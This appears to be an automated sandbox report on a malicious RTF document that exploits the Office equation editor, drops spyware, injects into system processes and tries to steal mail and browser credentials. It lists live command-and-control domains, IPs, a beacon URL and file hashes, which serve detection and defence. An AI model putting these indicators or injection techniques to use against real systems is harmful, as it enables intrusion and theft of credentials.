          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 680332 Sample: SecuriteInfo.com.Exploit.Rt... Startdate: 08/08/2022 Architecture: WINDOWS Score: 100 42 www.luanaterra.online 2->42 44 www.hogogala.com 2->44 50 Document contains OLE streams which likely are hidden ActiveX objects 2->50 52 Malicious sample detected (through community Yara rule) 2->52 54 Antivirus detection for dropped file 2->54 56 10 other signatures 2->56 12 EQNEDT32.EXE 47 2->12         started        15 WINWORD.EXE 292 21 2->15         started        signatures3 process4 file5 76 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 12->76 18 cmd.exe 12->18         started        36 C:\Users\user\AppData\Local\Temp\Client.exe, PE32 15->36 dropped 38 C:\Users\user\...\Client.exe:Zone.Identifier, ASCII 15->38 dropped 40 ~WRF{35F4FC89-AF57...1-CE9C986E155F}.tmp, Composite 15->40 dropped 78 Document exploit detected (creates forbidden files) 15->78 signatures6 process7 process8 20 Client.exe 18->20         started        signatures9 58 Multi AV Scanner detection for dropped file 20->58 60 Machine Learning detection for dropped file 20->60 62 Writes to foreign memory regions 20->62 64 3 other signatures 20->64 23 notepad.exe 20->23         started        process10 signatures11 66 Modifies the context of a thread in another process (thread injection) 23->66 68 Maps a DLL or memory area into another process 23->68 70 Sample uses process hollowing technique 23->70 72 Queues an APC in another process (thread injection) 23->72 26 explorer.exe 23->26 injected process12 dnsIp13 46 www.magadirect.co.uk 45.33.18.44, 49171, 80 LINODE-APLinodeLLCUS United States 26->46 74 System process connects to network (likely due to code injection or exploit) 26->74 30 NAPSTAT.EXE 9 26->30         started        signatures14 process15 dnsIp16 48 www.sqlite.org 45.33.6.223, 49172, 80 LINODE-APLinodeLLCUS United States 30->48 80 Tries to steal Mail credentials (via file / registry access) 30->80 82 Tries to harvest and steal browser information (history, passwords, etc) 30->82 84 Modifies the context of a thread in another process (thread injection) 30->84 86 2 other signatures 30->86 34 firefox.exe 30->34         started        signatures17 process18

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.12395.rtf15%ReversingLabsDocument-RTF.Trojan.Heuristic

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{35F4FC89-AF57-47A0-AA61-CE9C986E155F}.tmp100%AviraEXP/CVE-2017-11882.Gen
          C:\Users\user\AppData\Local\Temp\Client.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Temp\Client.exe22%ReversingLabsByteCode-MSIL.Spyware.Noon

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          9.0.notepad.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          9.2.notepad.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          9.0.notepad.exe.400000.3.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          9.0.notepad.exe.400000.4.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          9.0.notepad.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          9.0.notepad.exe.400000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://wellformedweb.org/CommentAPI/0%URL Reputationsafe
          www.bookmarkfiles.info/aekc/0%Avira URL Cloudsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
          http://treyresearch.net0%URL Reputationsafe
          http://java.sun.com0%URL Reputationsafe
          http://www.icra.org/vocabulary/.0%URL Reputationsafe
          http://computername/printers/printername/.printer0%Avira URL Cloudsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.magadirect.co.uk/aekc/?p6A=k0tTOTrAn50YQe1h4ozxDNX4wd5+O6pkKrWAMwmyhhYwJBfC5YpDY/r3FGLgLX7DF3fRHoVtyXQnCSOz0Ea/6qte5rYurCT1UmXBzRE=&xjRt=ZvcPNdzxaTTX6DM0%Avira URL Cloudsafe
          http://servername/isapibackend.dll0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.hogogala.com
          		162.213.253.236
          		truefalse
            		unknown
            www.sqlite.org
            		45.33.6.223
            		truefalse
              		high
              www.magadirect.co.uk
              		45.33.18.44
              		truetrue
                		unknown
                www.luanaterra.online
                		unknown
                		unknowntrue
                  		unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://www.sqlite.org/2014/sqlite-dll-win32-x86-3080700.zipfalse
                    		high
                    www.bookmarkfiles.info/aekc/true
                    • Avira URL Cloud: safe
                    		low
                    http://www.magadirect.co.uk/aekc/?p6A=k0tTOTrAn50YQe1h4ozxDNX4wd5+O6pkKrWAMwmyhhYwJBfC5YpDY/r3FGLgLX7DF3fRHoVtyXQnCSOz0Ea/6qte5rYurCT1UmXBzRE=&xjRt=ZvcPNdzxaTTX6DMtrue
                    • Avira URL Cloud: safe
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://www.windows.com/pctv.explorer.exe, 0000000A.00000000.1005046507.0000000003B10000.00000002.00000001.00040000.00000000.sdmpfalse
                      		high
                      http://investor.msn.comexplorer.exe, 0000000A.00000000.1005046507.0000000003B10000.00000002.00000001.00040000.00000000.sdmpfalse
                        		high
                        http://www.msnbc.com/news/ticker.txtexplorer.exe, 0000000A.00000000.1005046507.0000000003B10000.00000002.00000001.00040000.00000000.sdmpfalse
                          		high
                          http://wellformedweb.org/CommentAPI/explorer.exe, 0000000A.00000000.969373511.00000000046D0000.00000002.00000001.00040000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.iis.fhg.de/audioPAexplorer.exe, 0000000A.00000000.969373511.00000000046D0000.00000002.00000001.00040000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.piriform.com/ccleanerqexplorer.exe, 0000000A.00000000.1029291046.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.986329833.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.958357895.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1004626983.0000000002CBF000.00000004.00000001.00020000.00000000.sdmpfalse
                            		high
                            http://www.piriform.com/ccleaner1SPS0explorer.exe, 0000000A.00000000.978377131.0000000008611000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1010833057.0000000008611000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.993943393.0000000008611000.00000004.00000001.00020000.00000000.sdmpfalse
                              		high
                              http://windowsmedia.com/redir/services.asp?WMPFriendly=trueexplorer.exe, 0000000A.00000000.1005424318.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.1030081883.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.hotmail.com/oeexplorer.exe, 0000000A.00000000.1005046507.0000000003B10000.00000002.00000001.00040000.00000000.sdmpfalse
                                		high
                                http://treyresearch.netexplorer.exe, 0000000A.00000000.969373511.00000000046D0000.00000002.00000001.00040000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkexplorer.exe, 0000000A.00000000.1005424318.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.1030081883.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpfalse
                                  		high
                                  http://java.sun.comexplorer.exe, 0000000A.00000000.998739838.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.949886859.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.983940407.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1027026563.0000000000335000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.icra.org/vocabulary/.explorer.exe, 0000000A.00000000.1005424318.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.1030081883.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.explorer.exe, 0000000A.00000000.1001877731.0000000001DD0000.00000002.00000001.00040000.00000000.sdmpfalse
                                    		high
                                    http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 0000000A.00000000.1010360758.0000000008521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.995439916.0000000008807000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.979257547.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.950353171.00000000003A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.994846785.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.979787030.000000000880D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.992888492.00000000084D2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1011293822.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.993114505.0000000008521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1010156944.00000000084D2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.976835880.00000000084D2000.00000004.00000001.00020000.00000000.sdmpfalse
                                      		high
                                      http://investor.msn.com/explorer.exe, 0000000A.00000000.1005046507.0000000003B10000.00000002.00000001.00040000.00000000.sdmpfalse
                                        		high
                                        http://www.piriform.com/ccleanerexplorer.exe, 0000000A.00000000.976786692.00000000084C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1004626983.0000000002CBF000.00000004.00000001.00020000.00000000.sdmpfalse
                                          		high
                                          http://computername/printers/printername/.printerexplorer.exe, 0000000A.00000000.969373511.00000000046D0000.00000002.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		low
                                          http://www.%s.comPAexplorer.exe, 0000000A.00000000.1001877731.0000000001DD0000.00000002.00000001.00040000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		low
                                          http://www.autoitscript.com/autoit3explorer.exe, 0000000A.00000000.998739838.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.949886859.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.983940407.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1027026563.0000000000335000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://support.mozilla.orgexplorer.exe, 0000000A.00000000.998739838.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.949886859.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.983940407.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1027026563.0000000000335000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.piriform.com/ccleanervexplorer.exe, 0000000A.00000000.988586812.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1006236115.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.968187098.0000000004385000.00000004.00000001.00020000.00000000.sdmpfalse
                                                		high
                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameClient.exe, 00000005.00000002.947458698.0000000002671000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://servername/isapibackend.dllexplorer.exe, 0000000A.00000000.1008328661.0000000006450000.00000002.00000001.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		low

                                                  World Map of Contacted IPs

                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs

                                                  Public IPs

                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  45.33.6.223
                                                  		www.sqlite.orgUnited States
                                                  		63949LINODE-APLinodeLLCUSfalse
                                                  45.33.18.44
                                                  		www.magadirect.co.ukUnited States
                                                  		63949LINODE-APLinodeLLCUStrue

                                                  General Information

                                                  Joe Sandbox Version:35.0.0 Citrine
                                                  Analysis ID:680332
                                                  Start date and time: 08/08/202212:06:102022-08-08 12:06:10 +02:00
                                                  Joe Sandbox Product:CloudBasic
                                                  Overall analysis duration:0h 9m 2s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Sample file name:SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.12395.1520 (renamed file extension from 1520 to rtf)
                                                  Cookbook file name:defaultwindowsofficecookbook.jbs
                                                  Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                  Number of analysed new started processes analysed:14
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:1
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • HDC enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Detection:MAL
                                                  Classification:mal100.troj.spyw.expl.evad.winRTF@11/9@4/2
                                                  EGA Information:
                                                  • Successful, ratio: 100%
                                                  HDC Information:
                                                  • Successful, ratio: 22.2% (good quality ratio 20.9%)
                                                  • Quality average: 69.8%
                                                  • Quality standard deviation: 30%
                                                  HCA Information:
                                                  • Successful, ratio: 79%
                                                  • Number of executed functions: 99
                                                  • Number of non-executed functions: 22
                                                  Cookbook Comments:
                                                  • Adjust boot time
                                                  • Enable AMSI
                                                  • Found Word or Excel or PowerPoint or XPS Viewer
                                                  • Attach to Office via COM
                                                  • Scroll down
                                                  • Close Viewer

                                                  Warnings

                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, conhost.exe, svchost.exe
                                                  • Not all processes where analyzed, report is missing behavior information
                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                  • Report size getting too big, too many NtSetInformationFile calls found.

                                                  Simulations

                                                  Behavior and APIs

                                                  TimeTypeDescription
                                                  12:07:15API Interceptor38x Sleep call for process: EQNEDT32.EXE modified
                                                  12:07:17API Interceptor176x Sleep call for process: Client.exe modified
                                                  12:07:39API Interceptor6x Sleep call for process: notepad.exe modified
                                                  12:08:23API Interceptor356x Sleep call for process: NAPSTAT.EXE modified
                                                  12:09:04API Interceptor1x Sleep call for process: explorer.exe modified

                                                  Joe Sandbox View / Context

                                                  IPs

                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                  45.33.18.44https://storagefile.michaelangelo.lk/Get hashmaliciousBrowse
                                                  • www.bobdole.com/favicon.ico
                                                  $$$.exeGet hashmaliciousBrowse
                                                  • www.pavlonmedia.net/jdt0/?9rJx9rLP=kc640COIAz2+5qh36BYYmICu2Hu7e0PvVi7X4Boou2YN7sc8h4oT1TZhD0bctlnOtETx&WBTxb=6ltXP
                                                  Z14S9Zolcyub1pd.exeGet hashmaliciousBrowse
                                                  • www.pavlonmedia.net/jdt0/?YPyd=kc640COIAz2+5qh36BYYmICu2Hu7e0PvVi7X4Boou2YN7sc8h4oT1TZhD37m90H23jy2&Z8atc=2dtlDXLP5h8H2Zg0
                                                  Technical Specs_Docs_Rev0.exeGet hashmaliciousBrowse
                                                  • www.whiskeyandlaceboutque.com/ik0y/?Y0G8X8=5QdEhVILyddfgJdEFzxORhJ7/5Mhh1yOMYp1N8Rq4rjOVALdP2q071r7l7vA+mUmoS51&jtxt=ZDKTxBDPgJx8aJvP
                                                  8XLHJB41D3.exeGet hashmaliciousBrowse
                                                  • gorokborotun782699.com/status.php
                                                  niO15eMewi.exeGet hashmaliciousBrowse
                                                  • gorokborotun782699.com/status.php
                                                  Failure Notice Details PDF.exeGet hashmaliciousBrowse
                                                  • www.loginstrongmind.com/j6xw/?pR-xqjW=et2tM9NHPBPshdQ8qZwsvlPOoWCSjHldMzAIoHMMJxkpwYJ2ooWAlmwy099Eo1/t2+Ay&srL4=IdpX_hpxaNVLNhX
                                                  bd729c36_by_Libranalysis.exeGet hashmaliciousBrowse
                                                  • www.electricmotorcyclecollector.com/nt8e/?vZR=c/Zsv+lQ7zYnTxBG+cfc1H6mNoLtAs74Xv2n5d9M/VbMRGJLPC//X5gl/LyBPev+0zXyVm/1ww==&W6=GtSP

                                                  Domains

                                                  No context

                                                  ASNs

                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                  LINODE-APLinodeLLCUSZeVrhBGYOSGet hashmaliciousBrowse
                                                  • 198.58.123.77
                                                  4mwq2EIQH0Get hashmaliciousBrowse
                                                  • 198.58.123.77
                                                  fxVwqXFgQoGet hashmaliciousBrowse
                                                  • 198.58.123.77
                                                  HRn4JURL9wGet hashmaliciousBrowse
                                                  • 198.58.123.77
                                                  y65AMsMeBNGet hashmaliciousBrowse
                                                  • 198.58.123.77
                                                  2mAvpFLk7SGet hashmaliciousBrowse
                                                  • 198.58.123.77
                                                  x43Z94WJyRGet hashmaliciousBrowse
                                                  • 198.58.123.77
                                                  c3dUDCQVAQGet hashmaliciousBrowse
                                                  • 198.58.123.77
                                                  8mqKJqW7RCGet hashmaliciousBrowse
                                                  • 198.58.123.77
                                                  HxY0WguqynGet hashmaliciousBrowse
                                                  • 198.58.123.77
                                                  g4tAXaUuYEGet hashmaliciousBrowse
                                                  • 198.58.123.77
                                                  B1kefW3SOZGet hashmaliciousBrowse
                                                  • 139.162.225.162
                                                  MA3byFPsuwGet hashmaliciousBrowse
                                                  • 65.19.178.224
                                                  https://adclick.g.doubleclick.net/pcs/click?adurl=https://550418.secure.micomya.com/./outlook.office.com/mail/inbox/id/thall/op-f/77468616c6c406f702d662e6f7267#dGhhbGxAb3AtZi5vcmcGet hashmaliciousBrowse
                                                  • 109.237.27.102
                                                  1.exeGet hashmaliciousBrowse
                                                  • 172.104.187.4
                                                  CDXkaVYU19.exeGet hashmaliciousBrowse
                                                  • 198.58.106.108
                                                  04qb2qseWz.exeGet hashmaliciousBrowse
                                                  • 198.58.118.167
                                                  list049.exeGet hashmaliciousBrowse
                                                  • 139.162.30.170
                                                  product_list_95849.exeGet hashmaliciousBrowse
                                                  • 139.162.30.170
                                                  jYmrvNEQmFGet hashmaliciousBrowse
                                                  • 173.255.209.102
                                                  LINODE-APLinodeLLCUSZeVrhBGYOSGet hashmaliciousBrowse
                                                  • 198.58.123.77
                                                  4mwq2EIQH0Get hashmaliciousBrowse
                                                  • 198.58.123.77
                                                  fxVwqXFgQoGet hashmaliciousBrowse
                                                  • 198.58.123.77
                                                  HRn4JURL9wGet hashmaliciousBrowse
                                                  • 198.58.123.77
                                                  y65AMsMeBNGet hashmaliciousBrowse
                                                  • 198.58.123.77
                                                  2mAvpFLk7SGet hashmaliciousBrowse
                                                  • 198.58.123.77
                                                  x43Z94WJyRGet hashmaliciousBrowse
                                                  • 198.58.123.77
                                                  c3dUDCQVAQGet hashmaliciousBrowse
                                                  • 198.58.123.77
                                                  8mqKJqW7RCGet hashmaliciousBrowse
                                                  • 198.58.123.77
                                                  HxY0WguqynGet hashmaliciousBrowse
                                                  • 198.58.123.77
                                                  g4tAXaUuYEGet hashmaliciousBrowse
                                                  • 198.58.123.77
                                                  B1kefW3SOZGet hashmaliciousBrowse
                                                  • 139.162.225.162
                                                  MA3byFPsuwGet hashmaliciousBrowse
                                                  • 65.19.178.224
                                                  https://adclick.g.doubleclick.net/pcs/click?adurl=https://550418.secure.micomya.com/./outlook.office.com/mail/inbox/id/thall/op-f/77468616c6c406f702d662e6f7267#dGhhbGxAb3AtZi5vcmcGet hashmaliciousBrowse
                                                  • 109.237.27.102
                                                  1.exeGet hashmaliciousBrowse
                                                  • 172.104.187.4
                                                  CDXkaVYU19.exeGet hashmaliciousBrowse
                                                  • 198.58.106.108
                                                  04qb2qseWz.exeGet hashmaliciousBrowse
                                                  • 198.58.118.167
                                                  list049.exeGet hashmaliciousBrowse
                                                  • 139.162.30.170
                                                  product_list_95849.exeGet hashmaliciousBrowse
                                                  • 139.162.30.170
                                                  jYmrvNEQmFGet hashmaliciousBrowse
                                                  • 173.255.209.102

                                                  JA3 Fingerprints

                                                  No context

                                                  Dropped Files

                                                  No context

                                                  Created / dropped Files

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{35F4FC89-AF57-47A0-AA61-CE9C986E155F}.tmp

                                                  Download File
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                  Category:dropped
                                                  Size (bytes):962560
                                                  Entropy (8bit):7.212114876878578
                                                  Encrypted:false
                                                  SSDEEP:12288:rH/hLzLfhhDL1RJj2Y77Jk0dMjLA3PFqO8vUMFsPwBjA32fBE:b/N5hDLr5dk02j8FkvHBjAYE
                                                  MD5:426E7D731C2BA1BD9534EB8F737CDEAF
                                                  SHA1:C6DDBF5EC6281C716B47BE2F043B2E6ACDEF3CF4
                                                  SHA-256:A59D7D77C0A6B59BEA96AD8E4D32B42AD1EC4DEEC31590940CC0A373978C2E2D
                                                  SHA-512:165520C163AAFCFECD5DF204D2CD2805B0D180C0864A666365AF06DB470398C9D29B1C035DFA217B22630E930420697562830989F67EBB0C6F1B2DA0E2A8B5F8
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: rtf_cve2017_11882_ole, Description: Attempts to identify the exploit CVE 2017 11882, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{35F4FC89-AF57-47A0-AA61-CE9C986E155F}.tmp, Author: John Davison
                                                  • Rule: EXP_potential_CVE_2017_11882, Description: unknown, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{35F4FC89-AF57-47A0-AA61-CE9C986E155F}.tmp, Author: ReversingLabs
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  Reputation:low
                                                  Preview:......................>...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R...Q........................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{17E34B3C-ECE7-4F93-91C3-612FE851B900}.tmp

                                                  Download File
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1024
                                                  Entropy (8bit):1.1722028273607172
                                                  Encrypted:false
                                                  SSDEEP:6:beKNc1ElClXiKNgREqAWlgFJYm7KmrRmvlw5Fr+ur8FrK:beOc1MClXiOk5uFJd5Rmvq5ZP8ZK
                                                  MD5:75FCAEF5B6C0ADE6AF66F49874853C6A
                                                  SHA1:834FA72EEF104773D7052895798FED035EF01594
                                                  SHA-256:01E456476480AA1FD27ACF8F02AEA30D9B09581579A029154A6CD2A6850C85A0
                                                  SHA-512:5E7DBBEB9534660466B7ACD9E70725504C33CC435C08D30ECE035B7CC13F5DC8AAB73F8CA16AA562697063059FEC3C5EE8258F108EB68C8B1071DD381FEDB99A
                                                  Malicious:false
                                                  Reputation:moderate, very likely benign file
                                                  Preview:..).(.).(.).(.).(.).(.).5.=....... .P.a.c.k.a.g.e.E.M.B.E.D.5.=....... .E.q.u.a.t.i.o.n...3.E.M.B.E.D..........................................................................................................................................................................................................................................................................................................................................................................................................................................."...<...>...@...F............................................................................................................................................................................................................................................................................................................................................................................................CJ..OJ..QJ..^J.....j....CJ..OJ..QJ..U..^J...<..CJ..OJ..QJ..^J...OJ..QJ..^J.

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4AB22E69-27EE-49FB-B577-3348055FCC0D}.tmp

                                                  Download File
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1024
                                                  Entropy (8bit):0.05390218305374581
                                                  Encrypted:false
                                                  SSDEEP:3:ol3lYdn:4Wn
                                                  MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                  SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                  SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                  SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                  Malicious:false
                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\Client.exe

                                                  Download File
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):948736
                                                  Entropy (8bit):7.246077385861013
                                                  Encrypted:false
                                                  SSDEEP:12288:mH/hLzLfhhDL1RJj2Y77Jk0dMjLA3PFqO8vUMFsPwBjA32fBE:A/N5hDLr5dk02j8FkvHBjAYE
                                                  MD5:D94161753531177B2FB80365ADDCBFA8
                                                  SHA1:560C1FB1BF46B5144896570B228C7189B187ED7F
                                                  SHA-256:A5FC090CA6391A09E1DD85FF29F9D3F25300829DE6C74426EA0C142A56EABC1D
                                                  SHA-512:957DCD9145153D77D26FA9066ADAAD1336977144AC02A1E9E00971A2AE2A07820B787AF0237A1B97567F6935CF4C5B51F79D863879D9A179AFC0FFD18BEEE1E1
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 22%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....?.b.........."...0..>...8...........`... ....@.. ....................................@.....................................W....................................................................................................`..H...........b..dzG4e.,... ......................@....text....;...`...<...2.............. ..`.rsrc................n..............@..@.....................v.............. ..`.reloc...............x..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\Client.exe:Zone.Identifier

                                                  Download File
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):26
                                                  Entropy (8bit):3.95006375643621
                                                  Encrypted:false
                                                  SSDEEP:3:gAWY3n:qY3n
                                                  MD5:FBCCF14D504B7B2DBCB5A5BDA75BD93B
                                                  SHA1:D59FC84CDD5217C6CF74785703655F78DA6B582B
                                                  SHA-256:EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
                                                  SHA-512:AA1D2B1EA3C9DE3CCADB319D4E3E3276A2F27DD1A5244FE72DE2B6F94083DDDC762480482C5C2E53F803CD9E3973DDEFC68966F974E124307B5043E654443B98
                                                  Malicious:true
                                                  Preview:[ZoneTransfer]..ZoneId=3..

                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.12395.LNK

                                                  Download File
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Aug 8 18:07:02 2022, mtime=Mon Aug 8 18:07:02 2022, atime=Mon Aug 8 18:07:12 2022, length=2883613, window=hide
                                                  Category:dropped
                                                  Size (bytes):1204
                                                  Entropy (8bit):4.569449910987798
                                                  Encrypted:false
                                                  SSDEEP:24:8/N4ylhn/XTRKJkJHCn9Dze4HCn9DmDv3q6u7D:8fhn/XT04HCn1lHCnz60D
                                                  MD5:70A36B224D1C572B995BD556EF759DB3
                                                  SHA1:0CA78EEFCB96BD578DC302DAD8D06C6B13886761
                                                  SHA-256:05A6062747A4BB44506A265B36A2C5CD6FE3337B57B8D141994725F8345620C8
